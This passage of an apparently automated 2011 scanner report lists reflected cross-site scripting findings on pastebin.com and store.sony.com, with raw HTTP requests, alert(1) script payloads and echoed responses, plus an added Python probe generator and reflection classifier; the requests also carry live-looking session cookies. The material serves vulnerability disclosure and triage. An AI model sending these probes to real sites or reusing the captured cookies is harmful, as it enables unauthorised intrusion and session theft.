Content-Length: 10585

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/i/style.cssed4cc\"><script>alert(1)</script>b321a1af605?12"/>
...[SNIP]...

1.23. http://pastebin.com/js/ZeroClipboard.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /js/ZeroClipboard.swf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25ae8"><script>alert(1)</script>cd11aa5c8e0 was submitted in the REST URL parameter 1. This input was echoed as 25ae8\"><script>alert(1)</script>cd11aa5c8e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js25ae8"><script>alert(1)</script>cd11aa5c8e0/ZeroClipboard.swf HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:49 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=7; expires=Tue, 04-Oct-2011 18:10:49 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/js25ae8\"><script>alert(1)</script>cd11aa5c8e0/ZeroClipboard.swf"/>
...[SNIP]...

1.24. http://pastebin.com/js/ZeroClipboard.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /js/ZeroClipboard.swf

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dac32"><script>alert(1)</script>a0c8a47198e was submitted in the REST URL parameter 2. This input was echoed as dac32\"><script>alert(1)</script>a0c8a47198e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/ZeroClipboard.swfdac32"><script>alert(1)</script>a0c8a47198e HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:50 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=9; expires=Tue, 04-Oct-2011 18:10:50 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 10571

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/js/ZeroClipboard.swfdac32\"><script>alert(1)</script>a0c8a47198e"/>
...[SNIP]...
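
Findings 1.7 through 1.24 are one issue seen through eighteen probes: "REST URL parameter N" means the scanner appended a random-prefix/random-suffix canary to the Nth path segment, and every one of them came back in the same og:url attribute on the same 404 page. Two things are worth checking before filing or triaging this. First, whether the quote came back raw, backslash-escaped (as here, which still closes the attribute) or entity-encoded (which is what a fix looks like). Second, the requests above carry the quote and angle brackets unencoded in the request line, which a proxy can send but a browser will percent-encode in a path; whether a victim's browser can trigger this depends on the server decoding the path before reflecting it, and the report does not establish that. The block below is an added example, not the scanner's code: it regenerates the per-segment probes from a path (matching the request lines above), optionally in the percent-encoded form a browser would send, and classifies a response body by how the canary was reflected. The sample bodies are constructed here, the first copying the reflection shape from finding 1.8.

```python
import re
from urllib.parse import quote


def make_canary(prefix: str, suffix: str) -> str:
    """Canary of the shape used in the report: <prefix>"><script>alert(1)</script><suffix>.
    Unique prefix/suffix let a hit be tied back to a single probe."""
    return f'{prefix}"><script>alert(1)</script>{suffix}'


def segment_probes(path: str, canary: str, url_encode: bool = False):
    """One probe per path segment ("REST URL parameter N"), built the way the
    report's request lines show: the canary is appended to segment N and the
    rest of the path is left intact. With url_encode=True the canary is
    percent-encoded, which is what a browser would actually put on the wire."""
    segments = path.lstrip('/').split('/')
    injected = quote(canary, safe='') if url_encode else canary
    probes = []
    for n in range(1, len(segments) + 1):
        mutated = segments.copy()
        mutated[n - 1] = mutated[n - 1] + injected
        probes.append((n, '/' + '/'.join(mutated)))
    return probes


def classify_reflection(body: str, prefix: str, suffix: str) -> str:
    """Classifies how the canary came back in a response body.

    'absent'       prefix not reflected at all
    'raw'          quote and tags reflected verbatim (attribute breakout)
    'backslash'    quote reflected as \\" (still a breakout: a backslash
                   means nothing to an HTML tokenizer)
    'html-encoded' quote reflected as an entity (attribute stays closed)
    'filtered'     prefix present but the rest was altered or dropped
    """
    idx = body.find(prefix)
    if idx < 0:
        return 'absent'
    tail = body[idx + len(prefix):idx + len(prefix) + 80]
    if tail.startswith('"><script>alert(1)</script>' + suffix):
        return 'raw'
    if tail.startswith('\\"><script>alert(1)</script>' + suffix):
        return 'backslash'
    if re.match(r'(&quot;|&#0*34;|&#x0*22;)', tail, re.IGNORECASE):
        return 'html-encoded'
    return 'filtered'


def breaks_attribute(verdict: str) -> bool:
    """Only these verdicts let the payload leave the quoted attribute."""
    return verdict in ('raw', 'backslash')


# Constructed sample bodies (not captured traffic). The first reproduces the
# reflection shape of finding 1.8; the others show a fixed page and a 404
# page that does not echo the path at all.
SAMPLE_BACKSLASH = ('<meta property="og:url" content="http://pastebin.com/etc/adsca1b0\\">'
                    '<script>alert(1)</script>e6b4ca5c2bf/iframes/160x600.html"/>')
SAMPLE_ENCODED = ('<meta property="og:url" content="http://pastebin.com/etc/adsca1b0&quot;&gt;'
                  '&lt;script&gt;alert(1)&lt;/script&gt;e6b4ca5c2bf/iframes/160x600.html"/>')
SAMPLE_ABSENT = '<html><body><h1>404 Not Found</h1></body></html>'


if __name__ == '__main__':
    canary = make_canary('ca1b0', 'e6b4ca5c2bf')
    for n, probe in segment_probes('/etc/ads/iframes/160x600.html', canary):
        print(f'REST URL parameter {n}: GET {probe}')
    for n, probe in segment_probes('/etc/ads/iframes/160x600.html', canary, url_encode=True):
        print(f'browser-shaped probe {n}: GET {probe}')
    for name, body in (('backslash', SAMPLE_BACKSLASH), ('encoded', SAMPLE_ENCODED),
                       ('absent', SAMPLE_ABSENT)):
        verdict = classify_reflection(body, 'ca1b0', 'e6b4ca5c2bf')
        print(f'{name:9s} -> {verdict} (breaks attribute: {breaks_attribute(verdict)})')
```

Send each probe with whatever client you use and feed the body to classify_reflection; a 'backslash' or 'raw' verdict from the percent-encoded probe is the confirmation a browser-reachable victim needs, and 'html-encoded' on every segment is what a fix should produce.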

1.25. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [Ntk parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SearchCatalog

Issue detail

The value of the Ntk request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a90df"><a>002cb1260d was submitted in the Ntk parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd&langId=-1&Ntk=Producta90df"><a>002cb1260d&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CompareGrid=; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; _ensChanVal=Sony.com|1315352999758; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.5.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 
fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog","pv":5,"lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3.1,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":2,"lc":{"d0":{"v":2,"s":true}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; c_m=undefinedstore.sony.comstore.sony.com; s_visit=1; 
s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd%252526langId%25253D-1%252526Ntk%25253DProduct%252526store%2526ot%253DA%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FNtt%25253Ddvd%25252Bcd%252526langId%25253D-1%252526Ntk%25253DProduct%252526store%2526ot%253DA

Response

HTTP/1.1 200 OK
ntCoent-Length: 87955
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 87955
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:58:20 GMT
Connection: close
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclude -->
<script type
...[SNIP]...
<a href="SearchCatalog?Ntt=dvd+cd&Ntk=Producta90df"><a>002cb1260d&langId=-1&storeId=10151&Ntx=mode matchallpartial&y=0&N=0&catalogId=10551&x=0" id="" class="breadBoxRemoveLink" rel="">
...[SNIP]...

1.26. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [Ntt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SearchCatalog

Issue detail

The value of the Ntt request parameter is copied into a JavaScript rest-of-line comment. The payload 22e7a%0af613d80aa8c was submitted in the Ntt parameter. This input was echoed as 22e7a
f613d80aa8c
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript rest-of-line comment into which our data is being copied, so that the input following the newline is parsed as code. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CompareGrid=; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; _ensChanVal=Sony.com|1315352999758; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.5.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 
fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog","pv":5,"lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3.1,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":2,"lc":{"d0":{"v":2,"s":true}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; c_m=undefinedstore.sony.comstore.sony.com; s_visit=1; 
s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd%252526langId%25253D-1%252526Ntk%25253DProduct%252526store%2526ot%253DA%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FNtt%25253Ddvd%25252Bcd%252526langId%25253D-1%252526Ntk%25253DProduct%252526store%2526ot%253DA

Response

HTTP/1.1 200 OK
ntCoent-Length: 91021
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 91021
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:58:19 GMT
Connection: close
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclude -->
<script type
...[SNIP]...
name to call feedback URL
setpageName(s.pageName);
// Server (Not sure what this does)
s.server=''
// Site Section
s.channel=''
// Error Page Flag
// Online Search Terms
s.prop1= searchTerm; //'dvd cd22e7a
f613d80aa8c
'
// # Of Search Results
s.prop2='0'
// Page Template Type
s.prop3='SearchCatalog'
// Department
s.prop4=''
// Category
s.prop5=''
// E-Spot Impressions
s.prop6=s.pageName+'_'+epotpageImpression;
//s.p
...[SNIP]...

1.27. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [Ntt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SearchCatalog

Issue detail

The value of the Ntt request parameter is copied into the HTML document as plain text between tags. The payload 17748<a%20b%3dc>df6b2e2de39 was submitted in the Ntt parameter. This input was echoed as 17748<a b=c>df6b2e2de39 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd17748<a%20b%3dc>df6b2e2de39&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CompareGrid=; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; _ensChanVal=Sony.com|1315352999758; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.5.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 
fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog","pv":5,"lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3.1,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":2,"lc":{"d0":{"v":2,"s":true}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; c_m=undefinedstore.sony.comstore.sony.com; s_visit=1; 
s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd%252526langId%25253D-1%252526Ntk%25253DProduct%252526store%2526ot%253DA%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FNtt%25253Ddvd%25252Bcd%252526langId%25253D-1%252526Ntk%25253DProduct%252526store%2526ot%253DA

Response

HTTP/1.1 200 OK
ntCoent-Length: 91102
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 91102
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:58:12 GMT
Connection: close
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclude -->
<script type
...[SNIP]...
com/selfservice/microsites/searchEntry.do?locale=LA_eng_US&usemicrosite=true&region=UMRE_UNITEDSTATES_2_5&sonyregion=US&searchString=dvd cd17748&lt;a b=c&gt;df6b2e2de39');return false;">
Search "dvd cd17748<a b=c>df6b2e2de39" on <span class="searchTerm">
...[SNIP]...

1.28. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SearchCatalog

Issue detail

